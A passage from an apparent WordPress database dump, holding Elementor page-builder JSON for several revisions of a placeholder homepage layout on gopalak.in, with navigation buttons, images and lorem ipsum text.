\",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7831,1397,'_elementor_page_assets','a:0:{}'),(7834,1398,'_elementor_edit_mode','builder'),(7835,1398,'_elementor_template_type','wp-page'),(7836,1398,'_elementor_version','3.7.6'),(7837,1398,'_wp_page_template','elementor_canvas'),(7838,1398,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":34.872},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.023},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.042999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.044},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7839,1398,'_elementor_page_assets','a:0:{}'),(7841,1399,'_elementor_edit_mode','builder'),(7842,1399,'_elementor_template_type','wp-page'),(7843,1399,'_elementor_version','3.7.6'),(7844,1399,'_wp_page_template','elementor_canvas');
INSERT INTO `wp_postmeta` VALUES (7845,1399,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":34.872},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.023},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.042999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.044},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, 